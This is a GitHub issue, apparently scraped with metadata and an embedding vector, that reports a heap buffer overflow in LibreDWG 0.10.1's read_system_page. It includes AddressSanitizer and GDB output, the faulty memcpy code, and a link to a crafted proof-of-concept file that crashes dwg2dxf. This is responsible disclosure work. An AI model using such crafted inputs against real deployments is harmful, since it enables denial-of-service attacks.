(/root/libredwg-0.10.1/programs/.libs/dwg2dxf+0x41add9)   0x602000000031 is located 0 bytes to the right of 1-byte region [0x602000000030,0x602000000031) allocated by thread T0 here: #0 0x4e93cf in calloc /root/Download/llvm-8.0.0.src/projects/compiler-rt-8.0.0.src/lib/asan/asan_malloc_linux.cc:155 #1 0x7f131337a0a6 in decode_rs /root/libredwg-0.10.1/src/decode_r2007.c:590:34   SUMMARY: AddressSanitizer: heap-buffer-overflow /root/Download/llvm-8.0.0.src/projects/compiler-rt-8.0.0.src/lib/asan/asan_interceptors_memintrinsics.cc:23 in __asan_memcpy Shadow bytes around the buggy address: 0x0c047fff7fb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c047fff7fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c047fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c047fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c047fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c047fff8000: fa fa 00 00 fa fa[01]fa fa fa fa fa fa fa fa fa 0x0c047fff8010: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8020: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==2593==ABORTING Then, we used GDB to debug this bug, the GDB outputs: GDB //----------------------------------registers----------------------------------- RAX: 0x7ffff2c6a1e0 --> 0x7ffff6fed930 (<read_system_page+976>: dec DWORD PTR [rcx+rcx*4-0x1]) RBX: 0x7f RCX: 0x0 RDX: 0x60 ('\`')\ RSI: 0x602000000070 --> 0x0 RDI: 0x608000000020 --> 0x0 RBP: 0x0 RSP: 0x7fffffffc410 --> 0xffffffff866 --> 0x0 RIP: 0x7ffff6fed93a (<read_system_page+986>: call 0x7ffff6be3460 <__asan_memcpy@plt>) R8 : 0x1c2e6 R9 : 0x2 R10: 0x28 ('(') R11: 0x602000000060 --> 0x2ffffff00000002 R12: 0x602000000070 --> 0x0 R13: 0x608000000080 --> 0x0 R14: 0x60 ('\`') R15: 0x608000000020 --> 0x0 EFLAGS: 0x202 (carry parity adjust zero sign trap INTERRUPT direction overflow) //-------------------------------------code------------------------------------- 0x7ffff6fed931 <read_system_page+977>: mov rdi,r15 0x7ffff6fed934 <read_system_page+980>: mov rsi,r12 0x7ffff6fed937 <read_system_page+983>: mov rdx,r14 => 0x7ffff6fed93a <read_system_page+986>: call 0x7ffff6be3460 <__asan_memcpy@plt> 0x7ffff6fed93f <read_system_page+991>: mov rdi,r12 0x7ffff6fed942 <read_system_page+994>: call 0x7ffff6be25e0 <free@plt> 0x7ffff6fed947 <read_system_page+999>: jmp 0x7ffff6fed99a <read_system_page+1082> 0x7ffff6fed949 <read_system_page+1001>: lea rdi,[rip+0xd9a81c] # 0x7ffff7d8816c Guessed arguments: arg[0]: 0x608000000020 --> 0x0 arg[1]: 0x602000000070 --> 0x0 arg[2]: 0x60 ('\`') //------------------------------------stack------------------------------------- 0000| 0x7fffffffc410 --> 0xffffffff866 --> 0x0 0008| 0x7fffffffc418 --> 0x7fffffffd098 --> 0x2f65f 0016| 0x7fffffffc420 --> 0x7fffffffd090 --> 0x7ffff7e18800 --> 0x313230314341 ('AC1021') 0024| 0x7fffffffc428 --> 0xffffffffa13 --> 0x0 0032| 0x7fffffffc430 --> 0x7f 0040| 0x7fffffffc438 --> 0x60 ('\`') 0048| 0x7fffffffc440 --> 0xffffffffffffff91 0056| 0x7fffffffc448 --> 0x7fffffffcc80 --> 0xf //------------------------------------------------------------------------------ Legend: code, data, rodata, value 0x00007ffff6fed93a 666 memcpy (data, pedata, size_uncomp); gdb-peda$ ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000000071 at pc 0x0000004e7e12 bp 0x7fffffffc400 sp 0x7fffffffbbb0 READ of size 96 at 0x602000000071 thread T0 [New process 3499] [Thread debugging using libthread_db enabled] Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1". process 3499 is executing new program: /opt/llvm/bin/llvm-symbolizer Error in re-setting breakpoint 2: No symbol table is loaded. Use the "file" command. Warning: Cannot insert breakpoint 1. Cannot access memory at address 0x52c283 We ensured there is a heap overflow vulnerability because of the dangerous using of memcpy function, attacker can use this bug to finish a DoS attack. You can reproduce this heap overflow vulnerability by the follow step: /dwg2dxf -m -b [PoC_libreDWG_heapoverflow_decode_r2007_line666](https://github.com/yangjiageng/PoC/blob/master/PoC_libreDWG_heapoverflow_decode_r2007_line666)
LibreDWG "read_system_page" function heap overflow vulnerability
https://api.github.com/repos/LibreDWG/libredwg/issues/248/comments
6
2020-07-18T12:19:50
2020-07-21T13:02:44Z
https://github.com/LibreDWG/libredwg/issues/248
660,117,543
248
true
This is a GitHub Issue repo:libredwg owner:LibreDWG Title : LibreDWG "read_system_page" function heap overflow vulnerability Issue date: --- start body --- LibreDWG "read_system_page" function heap overflow vulnerability Description: There is a heap overflow bug in "read_system_page" function at libredwg-0.10.1/src/decode_r2007.c:666:5 An attacker can exploit this bug to cause a Denial of Service (DoS) by submitting a dwg file. This bug is caused by the following dangerous memcpy calling in read_system_page function: line 666 if (size_comp < size_uncomp)     error = decompress_r2007 (data, size_uncomp, pedata, MIN (pedata_size, size_comp));   else     memcpy (data, pedata, size_uncomp);   free (pedata); We used AddressSanitizer instrumented in LibreDWG and triggered this bug, the asan output as follows: ==2593==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000000031 at pc 0x0000004e7e12 bp 0x7ffd91a390c0 sp 0x7ffd91a38870 READ of size 96 at 0x602000000031 thread T0 #0 0x4e7e11 in __asan_memcpy /root/Download/llvm-8.0.0.src/projects/compiler-rt-8.0.0.src/lib/asan/asan_interceptors_memintrinsics.cc:23 #1 0x7f131338293e in read_system_page /root/libredwg-0.10.1/src/decode_r2007.c:666:5 #2 0x7f131336bc15 in read_pages_map /root/libredwg-0.10.1/src/decode_r2007.c:1014:10 #3 0x7f131336bc15 in read_r2007_meta_data /root/libredwg-0.10.1/src/decode_r2007.c:1814 #4 0x7f1312f9bc84 in decode_R2007 /root/libredwg-0.10.1/src/decode.c:3016:11 #5 0x7f1312f9bc84 in dwg_decode /root/libredwg-0.10.1/src/decode.c:241 #6 0x7f1312f7922f in dwg_read_file /root/libredwg-0.10.1/src/dwg.c:211:11 #7 0x52c287 in main /root/libredwg-0.10.1/programs/dwg2dxf.c:255:15 #8 0x7f1311da1b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #9 0x41add9 in _start (/root/libredwg-0.10.1/programs/.libs/dwg2dxf+0x41add9)   0x602000000031 is located 0 bytes to the right of 1-byte region [0x602000000030,0x602000000031) allocated by thread T0 here: #0 0x4e93cf in calloc /root/Download/llvm-8.0.0.src/projects/compiler-rt-8.0.0.src/lib/asan/asan_malloc_linux.cc:155 #1 0x7f131337a0a6 in decode_rs /root/libredwg-0.10.1/src/decode_r2007.c:590:34   SUMMARY: AddressSanitizer: heap-buffer-overflow /root/Download/llvm-8.0.0.src/projects/compiler-rt-8.0.0.src/lib/asan/asan_interceptors_memintrinsics.cc:23 in __asan_memcpy Shadow bytes around the buggy address: 0x0c047fff7fb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c047fff7fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c047fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c047fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c047fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c047fff8000: fa fa 00 00 fa fa[01]fa fa fa fa fa fa fa fa fa 0x0c047fff8010: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8020: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==2593==ABORTING Then, we used GDB to debug this bug, the GDB outputs: GDB //----------------------------------registers----------------------------------- RAX: 0x7ffff2c6a1e0 --> 0x7ffff6fed930 (<read_system_page+976>: dec DWORD PTR [rcx+rcx*4-0x1]) RBX: 0x7f RCX: 0x0 RDX: 0x60 ('\`')\ RSI: 0x602000000070 --> 0x0 RDI: 0x608000000020 --> 0x0 RBP: 0x0 RSP: 0x7fffffffc410 --> 0xffffffff866 --> 0x0 RIP: 0x7ffff6fed93a (<read_system_page+986>: call 0x7ffff6be3460 <__asan_memcpy@plt>) R8 : 0x1c2e6 R9 : 0x2 R10: 0x28 ('(') R11: 0x602000000060 --> 0x2ffffff00000002 R12: 0x602000000070 --> 0x0 R13: 0x608000000080 --> 0x0 R14: 0x60 ('\`') R15: 0x608000000020 --> 0x0 EFLAGS: 0x202 (carry parity adjust zero sign trap INTERRUPT direction overflow) //-------------------------------------code------------------------------------- 0x7ffff6fed931 <read_system_page+977>: mov rdi,r15 0x7ffff6fed934 <read_system_page+980>: mov rsi,r12 0x7ffff6fed937 <read_system_page+983>: mov rdx,r14 => 0x7ffff6fed93a <read_system_page+986>: call 0x7ffff6be3460 <__asan_memcpy@plt> 0x7ffff6fed93f <read_system_page+991>: mov rdi,r12 0x7ffff6fed942 <read_system_page+994>: call 0x7ffff6be25e0 <free@plt> 0x7ffff6fed947 <read_system_page+999>: jmp 0x7ffff6fed99a <read_system_page+1082> 0x7ffff6fed949 <read_system_page+1001>: lea rdi,[rip+0xd9a81c] # 0x7ffff7d8816c Guessed arguments: arg[0]: 0x608000000020 --> 0x0 arg[1]: 0x602000000070 --> 0x0 arg[2]: 0x60 ('\`') //------------------------------------stack------------------------------------- 0000| 0x7fffffffc410 --> 0xffffffff866 --> 0x0 0008| 0x7fffffffc418 --> 0x7fffffffd098 --> 0x2f65f 0016| 0x7fffffffc420 --> 0x7fffffffd090 --> 0x7ffff7e18800 --> 0x313230314341 ('AC1021') 0024| 0x7fffffffc428 --> 0xffffffffa13 --> 0x0 0032| 0x7fffffffc430 --> 0x7f 0040| 0x7fffffffc438 --> 0x60 ('\`') 0048| 0x7fffffffc440 --> 0xffffffffffffff91 0056| 0x7fffffffc448 --> 0x7fffffffcc80 --> 0xf //------------------------------------------------------------------------------ Legend: code, data, rodata, value 0x00007ffff6fed93a 666 memcpy (data, pedata, size_uncomp); gdb-peda$ ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000000071 at pc 0x0000004e7e12 bp 0x7fffffffc400 sp 0x7fffffffbbb0 READ of size 96 at 0x602000000071 thread T0 [New process 3499] [Thread debugging using libthread_db enabled] Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1". process 3499 is executing new program: /opt/llvm/bin/llvm-symbolizer Error in re-setting breakpoint 2: No symbol table is loaded. Use the "file" command. Warning: Cannot insert breakpoint 1. Cannot access memory at address 0x52c283 We ensured there is a heap overflow vulnerability because of the dangerous using of memcpy function, attacker can use this bug to finish a DoS attack. You can reproduce this heap overflow vulnerability by the follow step: /dwg2dxf -m -b [PoC_libreDWG_heapoverflow_decode_r2007_line666](https://github.com/yangjiageng/PoC/blob/master/PoC_libreDWG_heapoverflow_decode_r2007_line666) --- end body ---
7,110
[ -0.0435217060148716, 0.00222854595631361, -0.0057789357379078865, 0.01316060684621334, 0.06123441457748413, 0.027312597259879112, -0.0040791272185742855, 0.022702667862176895, -0.0023504034616053104, 0.048115115612745285, 0.006237450521439314, -0.003294282592833042, 0.020439010113477707, -0.01883627474308014, 0.011896594427525997, 0.020125072449445724, -0.026932567358016968, -0.0025982491206377745, -0.00005428079384728335, -0.011739625595510006, 0.03132769837975502, -0.018869319930672646, 0.005964820273220539, 0.05346858128905296, -0.011078703217208385, 0.007898016832768917, 0.00700164120644331, 0.0020777732133865356, -0.001709102769382298, 0.01625041663646698, 0.0038374776486307383, 0.02765958197414875, -0.014052852056920528, 0.015449048951268196, 0.04355475306510925, -0.008344138972461224, 0.04015100374817848, 0.08069856464862823, -0.005469128489494324, 0.028931856155395508, 0.02291746623814106, -0.04923868179321289, -0.015705157071352005, 0.04180331155657768, -0.001913575455546379, 0.024966323748230934, 0.009467706084251404, -0.012714484706521034, -0.0416380800306797, 0.015250773169100285, 0.0033892900682985783, -0.014655943028628826, -0.02042248658835888, -0.035028859972953796, 0.014061112888157368, -0.030369361862540245, 0.016374340280890465, 0.023594912141561508, -0.004147284664213657, -0.0010228798491880298, 0.002304965164512396, 0.0015438722912222147, 0.025610722601413727, 0.02042248658835888, -0.004539707209914923, -0.009186814539134502, -0.006472903769463301, 0.026056846603751183, -0.01733267679810524, 0.00025430001551285386, -0.011590917594730854, -0.042365092784166336, 0.012764054350554943, -0.005407167132943869, 0.03152597323060036, -0.018224921077489853, 0.013978498056530952, 0.014895527623593807, -0.007596470881253481, 0.03889525309205055, -0.04025014489889145, 0.036053288727998734, -0.01984417997300625, 0.011045657098293304, 0.00811694748699665, -0.004618191625922918, -0.03074939176440239, -0.07038818299770355, -0.002928710076957941, -0.030600683763623238, -0.016374340280890465, 0.010079058818519115, 0.007964109070599079, -0.013573683798313141, -0.004477745853364468, 0.007943455129861832, -0.03806910291314125, -0.024635864421725273, -0.06582782417535782, 0.0007559294463135302, -0.0493047721683979, 0.011194364167749882, -0.010351689532399178, 0.028518779203295708, 0.004531445913016796, 0.006357242353260517, 0.013747175224125385, 0.0014085897710174322, 0.017365721985697746, 0.14659248292446136, 0.01257403939962387, -0.003661920316517353, -0.009566844440996647, 0.012631869874894619, -0.011648748070001602, -0.009632936678826809, 0.032699111849069595, -0.013077992014586926, -0.05356771871447563, -0.019216304644942284, -0.017646614462137222, -0.0654643103480339, -0.013689344748854637, 0.0014674531994387507, -0.03400443121790886, 0.03909353166818619, -0.01576298661530018, -0.03849869966506958, -0.028634442016482353, -0.002199630718678236, -0.026222076267004013, -0.03506190702319145, 0.00757994782179594, -0.012400547042489052, 0.019943317398428917, 0.02151300758123398, -0.008261524140834808, 0.05317116528749466, -0.005477390252053738, 0.02058771625161171, -0.03806910291314125, -0.0284857340157032, -0.003957269713282585, 0.0048866914585232735, -0.028518779203295708, 0.02081904001533985, -0.0031228559091687202, 0.020703379064798355, -0.015812557190656662, 0.015077280811965466, -0.01665523089468479, -0.026139460504055023, 0.019596334546804428, 0.023264450952410698, 0.03925875946879387, -0.022223498672246933, -0.003680508816614747, 0.04315819963812828, -0.0018495486583560705, 0.0006077383295632899, -0.004750376101583242, -0.039622265845537186, 0.016308248043060303, -0.023561865091323853, -0.013970236293971539, -0.016985692083835602, 0.046132348477840424, 0.002965887077152729, -0.017316153272986412, 0.030551115050911903, -0.01099608838558197, -0.021612146869301796, 0.0284857340157032, 0.01915021240711212, -0.058458540588617325, 0.00006447861233027652, -0.007575817406177521, 0.01881975121796131, -0.017018739134073257, -0.01784489117562771, 0.0014529954642057419, -0.010715195909142494, -0.010293858125805855, 0.032798249274492264, 0.0353262759745121, 0.011219149455428123, -0.0011638421565294266, -0.027560442686080933, -0.009591628797352314, -0.0011039461242035031, -0.029212748631834984, -0.01776227541267872, 0.010715195909142494, 0.011425687000155449, 0.027312597259879112, -0.01733267679810524, -0.013094514608383179, -0.014416358433663845, 0.02466890960931778, 0.0026684722397476435, -0.0007667726604267955, 0.03015456162393093, -0.039952728897333145, 0.021893037483096123, -0.028783148154616356, 0.021017316728830338, -0.018803227692842484, 0.031939052045345306, 0.018224921077489853, -0.020802516490221024, -0.03813519328832626, -0.01188007090240717, 0.005931774154305458, 0.02417321875691414, -0.003537997603416443, 0.02599075436592102, 0.0077782245352864265, 0.008112816140055656, -0.02574290707707405, -0.011797456070780754, 0.02174432948231697, -0.028766624629497528, -0.0009211598662659526, -0.03410356864333153, -0.0569714680314064, -0.0353262759745121, 0.0054195597767829895, 0.007864970713853836, -0.023694049566984177, 0.009814689867198467, 0.03691248968243599, -0.04626453295350075, 0.012342716567218304, 0.007551032584160566, 0.012227054685354233, -0.029295362532138824, 0.006534865126013756, 0.016713062301278114, -0.026387305930256844, -0.010558227077126503, -0.0004494785098358989, 0.022785281762480736, 0.004118369426578283, -0.03174077346920967, 0.01003775093704462, 0.038201287388801575, -0.03017108514904976, -0.0010925865499302745, -0.007530378643423319, 0.028287457302212715, 0.00677031883969903, -0.006010258570313454, 0.030270222574472427, 0.007571686524897814, -0.0005958623951300979, -0.0057128435000777245, 0.029774531722068787, 0.022471344098448753, -0.031046805903315544, -0.03602024167776108, 0.03041893057525158, 0.01466420479118824, -0.029774531722068787, 0.019563287496566772, -0.008414361625909805, 0.01749790646135807, 0.011557871475815773, 0.008715907111763954, 0.008806784637272358, -0.04573579505085945, 0.03681334853172302, -0.031013760715723038, -0.03241821750998497, -0.06496862322092056, -0.021562576293945312, 0.015052496455609798, 0.008558938279747963, 0.02366100437939167, 0.023446204140782356, -0.02975800819694996, -0.0014251128304749727, -0.005427821073681116, -0.03286433964967728, 0.03638375177979469, 0.0010791615350171924, -0.03572282940149307, 0.015853863209486008, -0.027956996113061905, -0.012293146923184395, 0.0017194296233356, -0.021959129720926285, 0.008278046734631062, -0.04771856218576431, 0.0022409383673220873, 0.009434659965336323, 0.04292687773704529, 0.006253973580896854, -0.020058980211615562, -0.0383334681391716, -0.027296073734760284, -0.027940472587943077, -0.006914895493537188, -0.015812557190656662, 0.008439146913588047, -0.008050855249166489, -0.0073114484548568726, -0.032021664083004, 0.014730297029018402, -0.010467350482940674, -0.015986047685146332, 0.05819417163729668, -0.0473550520837307, -0.013854575343430042, -0.025181123986840248, -0.017117876559495926, -0.020769471302628517, -0.01600257121026516, -0.013201914727687836, 0.009814689867198467, 0.024867186322808266, -0.010549965314567089, -0.0005638489965349436, -0.04702459275722504, 0.0242393109947443, 0.037209901958703995, -0.02242177538573742, -0.026899520307779312, 0.04775160551071167, -0.060375213623046875, 0.006386157590895891, -0.011111749336123466, 0.0030836137011647224, -0.01096304226666689, -0.034533169120550156, -0.02508198656141758, -0.048214253038167953, -0.009021583944559097, 0.025941183790564537, 0.014416358433663845, 0.01036821212619543, -0.014589850790798664, 0.029377978295087814, -0.0033645054791122675, -0.006956202909350395, 0.017051784321665764, 0.000025833396648522466, 0.015705157071352005, 0.013639776036143303, 0.013301053084433079, 0.01615127921104431, 0.001599637558683753, 0.05571571737527847, 0.02951016277074814, 0.04831339046359062, -0.009145506657660007, 0.0027221720665693283, -0.014201559126377106, -0.01278883870691061, 0.001900150440633297, -0.018109260126948357, 0.009162030182778835, -0.006584434304386377, -0.0013600533129647374, 0.01124393381178379, 0.020686855539679527, 0.029064040631055832, 0.005390644073486328, -0.006365504115819931, -0.0310798529535532, -0.004192723426967859, -0.01908412016928196, 0.056607961654663086, -0.015407742001116276, 0.01491205021739006, -0.03198862075805664, -0.018637998029589653, 0.03489667549729347, 0.010764765553176403, -0.038366515189409256, 0.014300697483122349, -0.0062291887588799, 0.011483517475426197, 0.014953358098864555, -0.033971384167671204, 0.002195499837398529, 0.009616413153707981, -0.01842319779098034, 0.02782481163740158, 0.02875010296702385, -0.020108548924326897, -0.025941183790564537, 0.04338952153921127, -0.010392996482551098, -0.04963523522019386, -0.0010419846512377262, 0.03258344903588295, 0.010558227077126503, -0.02192608453333378, 0.042199861258268356, -0.04956914111971855, -0.0021314730402082205, 0.017679661512374878, 0.01454028207808733, 0.008319354616105556, -0.0006366536836139858, 0.03264954313635826, 0.03364092484116554, -0.026899520307779312, 0.019546765834093094, -0.0026457528583705425, 0.010938256978988647, 0.014375051483511925, -0.023958418518304825, -0.004564492031931877, 0.028370073065161705, 0.04583493247628212, -0.010145151056349277, 0.0002450058236718178, -0.031228559091687202, 0.012268362566828728, -0.021694760769605637, 0.006935548968613148, 0.0036970318760722876, 0.05234501510858536, -0.011433948762714863, 0.025974230840802193, -0.013515852391719818, 0.0115743950009346, 0.027395213022828102, -0.03007194586098194, -0.0013517917832359672, 0.014738557860255241, -0.005320421420037746, 0.016531309112906456, -0.016613924875855446, -0.024305403232574463, -0.009773382917046547, -0.029262317344546318, -0.028436165302991867, 0.007856708951294422, -0.008236738853156567, 0.02242177538573742, -0.011433948762714863, -0.03426880016922951, -0.014837696217000484, -0.035359323024749756, -0.012400547042489052, -0.0037775817327201366, 0.04342256858944893, -0.0291631780564785, -0.05991256982088089, 0.014300697483122349, -0.02784133516252041, -0.0048082065768539906, 0.007361017633229494, -0.006303542759269476, -0.03767254948616028, -0.037375133484601974, 0.022884421050548553, 0.004977568052709103, 0.014589850790798664, 0.04157198593020439, -0.015217727050185204, 0.017183968797326088, 0.03433489426970482, 0.07210657745599747, 0.03740818053483963, -0.024222787469625473, 0.0017927506705746055, -0.027973519638180733, -0.00658030342310667, 0.027395213022828102, 0.054691288620233536, -0.017299629747867584, -0.009310737252235413, 0.02742825821042061, 0.00987252127379179, 0.013482806272804737, -0.015986047685146332, -0.017960552126169205, -0.013590206392109394, -0.01291276142001152, -0.006134181283414364, -0.04609930142760277, 0.027263028547167778, -0.015465572476387024, 0.020604239776730537, -0.01766313798725605, 0.002166584599763155, 0.014498974196612835, 0.02990671619772911, 0.028948379680514336, -0.035293228924274445, -0.04190244898200035, -0.007162740919739008, 0.007641909644007683, -0.009632936678826809, 0.019398057833313942, 0.06034217029809952, 0.03499581292271614, 0.024454109370708466, -0.019794611260294914, 0.01591995544731617, 0.0018629735568538308, 0.02767610363662243, -0.01036821212619543, -0.03339307755231857, 0.04348865896463394, -0.011318287812173367, -0.04309210926294327, 0.03899439051747322, -0.03190600499510765, 0.005369990598410368, -0.01873713545501232, 0.0067083570174872875, -0.042133770883083344, 0.0016306182369589806, -0.0113678565248847, 0.015349910594522953, 0.019398057833313942, -0.003201340325176716, -0.029708439484238625, -0.00821608491241932, 0.03250083327293396, 0.025693338364362717, 0.03760645538568497, 0.011830502189695835, 0.002608576091006398, -0.0038684585597366095, -0.01716744713485241, 0.0124583775177598, 0.01641564816236496, -0.018472766503691673, 0.007067733444273472, -0.0026209685020148754, 0.01566384918987751, -0.010822596028447151, 0.017696183174848557, -0.0053452057763934135, -0.013276268728077412, -0.009649459272623062, 0.04874299094080925, -0.047189824283123016, 0.0031579674687236547, -0.024701956659555435, 0.03273215517401695, -0.0036082204896956682, 0.017398769035935402, 0.02133125439286232, -0.01467246562242508, 0.026023799553513527, -0.012070085853338242, 0.017696183174848557, 0.00679097231477499, -0.0012206401443108916, 0.013449760153889656, -0.0007419880712404847, -0.0030154562555253506, 0.020785992965102196, -0.015944739803671837, 0.008715907111763954, -0.0035627821926027536, -0.001757639111019671, -0.015110326930880547, 0.006266365759074688, -0.017349200323224068, 0.006555519066751003, 0.011731363832950592, -0.01684524677693844, -0.03073286823928356, 0.018373629078269005, -0.0027820682153105736, 0.014928573742508888, -0.007935193367302418, -0.006291150115430355, 0.02456977218389511, -0.023875802755355835, 0.0067827110178768635, 0.0003327844897285104, -0.003814758500084281, -0.012433593161404133, -0.027213459834456444, -0.01411894429475069, 0.024272356182336807, 0.029311886057257652, -0.011681794188916683, -0.02040596306324005, 0.005043660290539265, 0.018803227692842484, -0.019596334546804428, 0.00047942655510269105, 0.015498618595302105, 0.0113678565248847, -0.006985118146985769, 0.014631158672273159, 0.003647462697699666, 0.005369990598410368, 0.0022120228968560696, -0.005262590479105711, -0.017547477036714554, -0.01908412016928196, 0.03638375177979469, 0.030138038098812103, -0.03223646432161331, -0.03289738669991493, -0.007472548168152571, 0.021265162155032158, -0.006163096521049738, -0.02633773721754551, 0.021314730867743492, 0.020141594111919403, 0.017944028601050377, 0.029559731483459473, 0.012549254111945629, 0.020141594111919403, -0.017778798937797546, 0.002994802314788103, 0.014218082651495934, -0.020802516490221024, 0.008026069961488247, 0.00005470032192533836, -0.045041825622320175, 0.009765121154487133, -0.000093458489573095, 0.01682046242058277, -0.007728655356913805, 0.0036495281383395195, -0.007294925395399332, -0.016027355566620827, -0.015399480238556862, -0.014837696217000484, 0.022289590910077095, 0.0018960196757689118, -0.04140675812959671, -0.002808918012306094, 0.03568978235125542, 0.022289590910077095, -0.005093229468911886, -0.02658558264374733, 0.020538147538900375, 0.0026560798287391663, 0.01511858869343996, -0.029956284910440445, 0.0164239089936018, -0.02316531166434288, 0.008410231210291386, 0.008401969447731972, 0.02473500184714794, 0.03316175565123558, 0.03526018187403679, -0.03413661569356918, 0.011169579811394215, 0.008732430636882782, 0.012020517140626907, 0.022620052099227905, -0.01470551174134016, 0.056607961654663086, 0.019447626546025276, 0.009252906776964664, 0.020141594111919403, -0.007815401069819927, -0.004952783230692148, -0.014325481839478016, 0.016473477706313133, 0.014449404552578926, -0.02992323972284794, -0.008092162199318409, -0.003019586903974414, 0.04183635488152504, 0.032699111849069595, 0.005729366559535265, -0.012450115755200386, -0.004754506982862949, 0.014218082651495934, -0.01840667426586151, -0.016514785587787628, 0.01145047228783369, 0.02275223657488823, -0.021876513957977295, 0.00842262338846922, 0.004188592545688152, -0.00799715518951416, 0.0032261249143630266, -0.014680727384984493, -0.019811132922768593, 0.007588209584355354, -0.02716388925909996, -0.0036412666086107492, -0.025098508223891258, -0.015589495189487934, 0.022438298910856247, -0.014432881958782673, 0.025709861889481544, 0.017349200323224068, 0.013234960846602917, -0.04193549603223801, 0.02417321875691414, -0.00987252127379179, -0.014267651364207268, 0.002393776550889015, -0.03674725815653801, 0.009252906776964664, -0.003205471206456423, 0.0038457391783595085, 0.012631869874894619, 0.01033516600728035, -0.0048082065768539906, 0.006704226601868868, 0.022041745483875275, 0.008170646615326405, -0.004758637864142656, 0.01850581355392933, -0.0336739718914032, 0.02157909981906414, 0.028799671679735184, -0.008980276063084602, 0.006530734710395336, 0.019365010783076286, -0.008401969447731972, -0.006113527342677116, -0.032021664083004, -0.03091462142765522, -0.016523048281669617, -0.0616309680044651, 0.009071152657270432, -0.018604950979351997, -0.0221739299595356, -0.008327615447342396, 0.002589987590909004, 0.012648392468690872, 0.019612858071923256, -0.03175729885697365, 0.009046368300914764, 0.00833174679428339, -0.014465928077697754, -0.008385446853935719, 0.05059356987476349, -0.014821173623204231, 0.010483874008059502, 0.021893037483096123, 0.010153412818908691, -0.002841964131221175, 0.03635070472955704, -0.026056846603751183, -0.019860703498125076, -0.012400547042489052, 0.009517275728285313, 0.01658913865685463, -0.03806910291314125, 0.0260072760283947, 0.005721105262637138, 0.022140882909297943, 0.011194364167749882, -0.022785281762480736, -0.008377185091376305, 0.008112816140055656, 0.026189029216766357, -0.005531090311706066, 0.008897661231458187, -0.00945118349045515, -0.015961263328790665, 0.03426880016922951, -0.01791098341345787, 0.009509013965725899, 0.033938340842723846, -0.019365010783076286, 0.010079058818519115, -0.017283108085393906, 0.01881975121796131, -0.0068198880180716515, 0.022190453484654427, 0.006084612105041742, -0.00556000554934144, 0.009492490440607071, 0.027543919160962105, -0.05138667672872543, 0.01412720512598753, 0.012136178091168404, 0.015556449070572853, 0.02741173654794693, -0.015432526357471943, 0.0026911913882941008, -0.027048228308558464, 0.017035262659192085, 0.02081904001533985, 0.0031249213498085737, 0.016060402616858482, -0.006733141839504242, -0.010979564860463142, 0.02466890960931778, -0.011202625930309296, -0.0067455340176820755, 0.04705763980746269, -0.033971384167671204, 0.004461222793906927, -0.014490712434053421, 0.016680017113685608, 0.009178552776575089, -0.01625041663646698, -0.017382245510816574, 0.01801012083888054, -0.004192723426967859, -0.05075880140066147, -0.031195513904094696, -0.006869456730782986, -0.011442210525274277, -0.017547477036714554, 0.018224921077489853, -0.03177382051944733, 0.01673784665763378, -0.007819532416760921, 0.013747175224125385, 0.0008989570196717978, 0.023892326280474663, -0.01567211002111435, -0.008426753804087639, 0.004601668566465378, 0.00166676240041852, 0.00478755310177803, -0.0032219942659139633, -0.016118232160806656, 0.0034161400981247425, -0.001843352452851832, -0.05591399222612381, -0.003453316865488887, -0.013730652630329132, 0.01200399361550808, 0.009864259511232376, 0.020802516490221024, 0.022206975147128105, 0.008104554377496243, -0.017778798937797546, -0.01000470481812954, 0.0002984475577250123, 0.007133825682103634, 0.010409520007669926, 0.007935193367302418, 0.009839475154876709, -0.027130844071507454, 0.03773863986134529, -0.00808803178369999, -0.021595623344182968, -0.03048502281308174, -0.0015500683803111315, -0.013077992014586926, -0.026056846603751183, -0.029262317344546318, -0.009079414419829845, 0.009938612580299377, 0.0052791135385632515, 0.031955573707818985, 0.005626097787171602, -0.027147367596626282, 0.024189742282032967, -0.015729941427707672, -0.0013270071940496564, -0.008955491706728935, 